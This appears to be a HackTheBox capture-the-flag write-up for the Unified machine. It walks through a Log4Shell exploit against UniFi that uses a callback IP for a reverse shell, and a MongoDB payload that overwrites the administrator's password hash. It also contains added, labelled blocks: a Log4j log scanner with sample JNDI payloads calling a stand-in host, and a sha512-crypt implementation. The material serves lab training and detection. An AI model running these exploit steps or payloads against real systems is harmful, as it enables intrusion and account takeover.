Unified WriteUp | HackTheBox

Onurcan Genç
7 min read · Mar 1, 2024


Hello everyone! Today, I am going to analyze a tier 2 machine called Unified. As usual, before beginning, I will check whether the target is running a web application.

1) Initial Findings

  • To start, I attempted to use the WhatWeb tool, a next-generation web scanner. However, it returned nothing, since there were no active services on ports 443 and 80. Therefore, I decided to proceed with port scanning.
After I solved the machine, it automatically terminated itself. Consequently, I created a new instance, resulting in a change in the IP address.

2) Port Scanning

I utilized my standard nmap syntax as follows:

sudo nmap -sV -sC [IP ADDRESS]

Note: This approach may be time-consuming, as services are sometimes deployed on non-default ports such as 45323 or 12675. Therefore, I highly recommend applying the full-scan parameter and optionally adding the verbosity option, so that no time is wasted during the CTF engagement. Additionally, if nmap is run without a valid port range or specific port numbers, it defaults to scanning the top 1000 ports.

  • In my scenario, as there was no web app on the default ports, I decided to conduct a full scan against our machine.
To allocate time for other tasks, I promptly checked each open port to determine whether a web app was present.
  • After testing every port that appeared active, I found that port 8443 was open. However, I encountered the typical SSL/TLS certificate error, which is commonly encountered. Therefore, there is no need to worry; simply proceed by accepting the risk and continuing.
My browser did not recognize the certificate as valid.
  • Subsequently, I identified a web app called UniFi, protected by its own login form. Further research revealed that this web app allows users to manage devices on the network, similar to a “Modem Arayüzü” (modem interface) in Turkish.
Despite trying millions of wordlists, I was unable to breach it.
  • However, I became curious about UniFi version 6.4.54 and discovered valuable information about a vulnerability in that version.

CVE-2021-44228
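As an added example from the defender's side (this is not code from the post or from the exploit repository), here is a small Python log scanner that resolves the nested-lookup tricks used to disguise the CVE-2021-44228 trigger string and reports every line that carries a JNDI lookup. The access-log lines, client addresses, paths and the callback host 203.0.113.7 are constructed; the resolution rules cover only the Log4j lookups commonly used for obfuscation, which is enough for triage of web server logs in front of a UniFi controller.

```python
import re

# Constructed sample access-log lines (not from the post). The User-Agent field
# is one of the places where attacker-controlled text reaches Log4j; 203.0.113.7
# is a documentation address standing in for a callback host.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2024:10:00:00 +0000] "GET /manage/account/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Mar/2024:10:00:01 +0000] "POST /api/login HTTP/1.1" 400 0 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [01/Mar/2024:10:00:02 +0000] "POST /api/login HTTP/1.1" 400 0 "-" "${${lower:j}ndi:${::-l}${::-d}ap://203.0.113.7:1389/a}"',
    '10.0.0.5 - - [01/Mar/2024:10:00:03 +0000] "GET /status HTTP/1.1" 200 88 "-" "${date:yyyy}-client"',
]

# An innermost ${...} lookup: a body that contains no nested braces.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")

# A fully resolved JNDI lookup with a protocol seen in exploitation attempts.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://[^}]*\}", re.I)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j's substitutor would, for the
    handful of lookups attackers use to hide the word 'jndi'."""
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return match.group(0)            # keep it: this is what we want to detect
    if lowered.startswith("lower:"):
        return body[6:].lower()          # ${lower:J} -> j
    if lowered.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${undefined:-x} falls back to x
    return ""                            # any other lookup: drop it, it cannot spell jndi


def normalize(text):
    """Peel nested lookups from the inside out until only literal text and
    plain ${jndi:...} expressions remain."""
    while True:
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            return text
        text = resolved


def find_jndi_lookups(lines):
    """Return (line_number, protocol, normalized_lookup) for every line that
    carries a JNDI lookup, including obfuscated ones."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = JNDI_LOOKUP.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower(), match.group(0)))
    return hits


if __name__ == "__main__":
    for number, protocol, lookup in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: {protocol} lookup {lookup}")
```

Run it against the constructed sample and lines 2 and 3 are reported as the same ldap lookup, while the benign date lookup on line 4 is ignored; the normalization step is what makes a plain substring rule useless to evade.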

For manual exploitation, I found another resource:

3) Exploitation

Initially, I found two approaches for the CTF, one for automated exploitation and the other manual. I decided to use the automated method since I found a public exploit on GitHub. Although a manual approach exists, it is more complicated. However, I will provide a manual writeup after presenting the solution.

  • I found a repository that directly achieves Remote Code Execution (RCE).
I installed the related requirements on my local machine.
  • The repository also explains how to use the exploit.

Usage

usage: exploit.py [-h] -u URL -i CALLBACK -p PORT

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Unifi Network Manager base URL
-i CALLBACK, --ip CALLBACK
Callback IP for payload delivery and reverse shell.
-p PORT, --port PORT Callback port for reverse shell.

Example usage:
python3 exploit.py -u https://unifi.acme.com:8443 -i 10.10.10.1 -p 4444

After the -i parameter, you must use your VPN IP address, which is our tun0 address. The port can be any value since we will deploy a netcat listener to receive the shell.

Next, start the netcat listener and then run the exploit. The exploit will display the message “Firing payload!”. You can also see below how the exploit spawned a shell:

The typical RCE worked and our shell appeared.
  • Before proceeding with the discovery of our machine, I wanted to identify which shell we were using, so that I could upgrade it for increased flexibility and speed.
  • To determine the shell type, I executed the following command:
echo $SHELL
This prints the shell type; we got this!
  • After identifying our shell, I decided to upgrade it using this source, since it was not safe to use the usual Python one-liner directly: I could not get any information on whether the machine had Python (2 or 3) installed, and, as you can see here, there was no information about installed packages on the target.

That’s why I set the environment variable “SHELL” to /bin/bash as the default shell. Moreover, the “script” command is used to record terminal sessions, and “/dev/null” is a special file on Unix-like operating systems that discards all data written to it. By the way, you can find the user flag simply by changing into the /home/ directory.

4) Post Exploitation

  • As you remember, we authenticated to our machine via our Log4j exploit. After that, I tried to execute the linpeas script on the machine. However, it did not work, since the machine did not have the “wget” command available as a built-in tool.
Unfortunately :(
  • After thorough research, I discovered that the CTF required us to interact directly with the non-relational MongoDB database. Although I’m familiar with MySQL, I lacked experience with MongoDB. Nevertheless, I searched for how to authenticate to our MongoDB server, primarily through a terminal interface.
  • The manual page of MongoDB provided a solution, but first, I needed to determine which port MongoDB was using.

To accomplish this, I used a common command on GNU/Linux distributions and avoided manual searching by piping its output into grep on the target terminal.

ps aux | grep mongodb

Since the port could not be seen clearly, I also wanted to include the port number in the PoC (Proof of Concept).

After identifying the required port, I initiated our MongoDB connection:

mongo --port 27117
As you can see from the top part of the terminal, we could authenticate.
  • Authentication was successful, and thanks to ChatGPT, finding the MongoDB syntax was straightforward.

I could not make progress after that, so I went through this reference again for the MongoDB part:

There was a payload that reconnects to MongoDB every time it runs. Instead, I was going to run just the database command.

db.admin.find().forEach(printjson);
This moves to the admin collection and prints every document in JSON format. I also tried it without the forEach() part, but the output looked really bad.
The format of the returned hash ($6$ prefix) indicates SHA-512 crypt hashing.
  • Moreover, it was not a good idea to bruteforce our hash with rockyou.txt using john, or to try decryption websites.
  • I assumed that, since we can access the admin collection, we can also perform update or delete operations on our DB. However, how am I able to generate a SHA-512 password hash on our Kali VM?
echo -n "your_string_here" | sha512sum
You cannot use this command, since sha512sum does not produce the $6$ (crypt) format.

For that reason, I asked ChatGPT for another method.

mkpasswd --method=sha-512 (it is not best practice)

I used the manual page (man mkpasswd) and searched for -m, which is the method option.
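To make the $6$ format concrete, here is an added Python implementation of the sha512-crypt algorithm (Ulrich Drepper's specification, which is what glibc and mkpasswd --method=sha-512 implement); it is not code from the post. It shows why sha512sum output cannot be dropped into x_shadow: the crypt form is salted, iterated 5000 times by default and written in crypt's own base64 alphabet, whereas sha512sum is a single unsalted hash in hex. The expected value in the self-check is the first SHA-512 test vector published with the specification; the password and salt strings used are constructed.

```python
import hashlib
import secrets

# crypt(3)'s own base64 alphabet (not the RFC 4648 one).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _b64_from_24bit(b2, b1, b0, n):
    """Emit n characters from a 24-bit group, least significant 6 bits first."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(ITOA64[w & 0x3F])
        w >>= 6
    return "".join(out)


def _encode(digest):
    """The spec's byte permutation for SHA-512: 21 groups of three bytes taken
    at offsets (i, i+21, i+42) in a rotating pattern, then the last byte alone."""
    i, j, k = 0, 21, 42
    out = []
    for _ in range(21):
        out.append(_b64_from_24bit(digest[i], digest[j], digest[k], 4))
        i, j, k = j + 1, k + 1, i + 1
    out.append(_b64_from_24bit(0, 0, digest[63], 2))
    return "".join(out)


def sha512_crypt(password, salt, rounds=5000):
    """Return the $6$ string mkpasswd would produce for this password and salt
    (the salt is truncated to 16 characters, as the spec requires)."""
    pw = password.encode()
    salt = salt[:16]
    sb = salt.encode()
    # Digest B mixes password, salt, password.
    b = hashlib.sha512(pw + sb + pw).digest()
    # Digest A: password, salt, B repeated to the password length, then B or
    # the password for each bit of the password length.
    a = hashlib.sha512(pw + sb)
    a.update(b * (len(pw) // 64) + b[: len(pw) % 64])
    n = len(pw)
    while n > 0:
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    # P and S: digests of the repeated password / salt, cut to their lengths.
    dp = hashlib.sha512(pw * len(pw)).digest()
    p = (dp * (len(pw) // 64 + 1))[: len(pw)]
    ds = hashlib.sha512(sb * (16 + a[0])).digest()
    s = (ds * (len(sb) // 64 + 1))[: len(sb)]
    # The expensive part: `rounds` chained SHA-512 computations.
    c = a
    for r in range(rounds):
        h = hashlib.sha512()
        h.update(p if r & 1 else c)
        if r % 3:
            h.update(s)
        if r % 7:
            h.update(p)
        h.update(c if r & 1 else p)
        c = h.digest()
    prefix = "$6$" if rounds == 5000 else f"$6$rounds={rounds}$"
    return f"{prefix}{salt}${_encode(c)}"


def generate(password):
    """Hash with a fresh random 16-character salt, as mkpasswd does."""
    salt = "".join(secrets.choice(ITOA64) for _ in range(16))
    return sha512_crypt(password, salt)


def verify(password, stored):
    """Check a password against a stored $6$[rounds=N$]salt$hash string."""
    parts = stored.split("$")
    if len(parts) < 4 or parts[1] != "6":
        return False
    rounds, idx = 5000, 2
    if parts[idx].startswith("rounds="):
        rounds, idx = int(parts[idx][7:]), idx + 1
    if idx + 1 >= len(parts):
        return False
    salt, digest = parts[idx], parts[idx + 1]
    computed = sha512_crypt(password, salt, rounds).rsplit("$", 1)[1]
    return secrets.compare_digest(computed, digest)


def sha512sum_hex(text):
    """What `echo -n text | sha512sum` prints: one unsalted SHA-512 in hex,
    which is not the format x_shadow stores."""
    return hashlib.sha512(text.encode()).hexdigest()
```

verify() is also the check an auditor wants when an x_shadow value changes unexpectedly: pointing it at a stored hash tells you whether a candidate password is the one it encodes, without ever needing the plaintext to be recorded anywhere.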
  • After that, we can create our payload using these:
db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$epfPASDVANkEIU42$jR90CIAu1jCYFO9ErMjyMHl3AzXU8BdFqklbEFH4YdVrv.5I8rTE3msPXxCU4nv06PBIIXXsbuELKUdbv2HQk/"}})
  • These are the same objects and can be created using any AI tool. There is no need to know how to update objects in a non-relational DB.

Note: The purpose of this operation is to replace the password using our generated SHA-512 hash, which corresponds to CTIS in my case.

If the modification succeeds, you will get this message:

“nMatched” means that the query found a matching document for your payload. “nModified” means that the necessary modification was applied successfully.

As a last step, we can try to authenticate with our brand-new credentials:

administrator
CTIS
It took some time to authenticate.

After browsing this “modem interface”-like website, I found the SSH credentials (user:pass) simply by clicking the highlighted section “Site”.

After this, you can immediately use this command to connect through SSH:

ssh root@10.129.58.253

pass: CTIS

If you just run ls -l, you will find the root flag.

Thank you for taking the time to read my writeup!

May The Pentest Be With You !

My social media accounts:

https://www.instagram.com/onurcan.gnc/

https://twitter.com/onurcangenc1999

https://www.linkedin.com/in/onurcangnc/

Written by Onurcan Genç

Offensive Security Specialist | Tech Enthusiast Welcome to my playground !
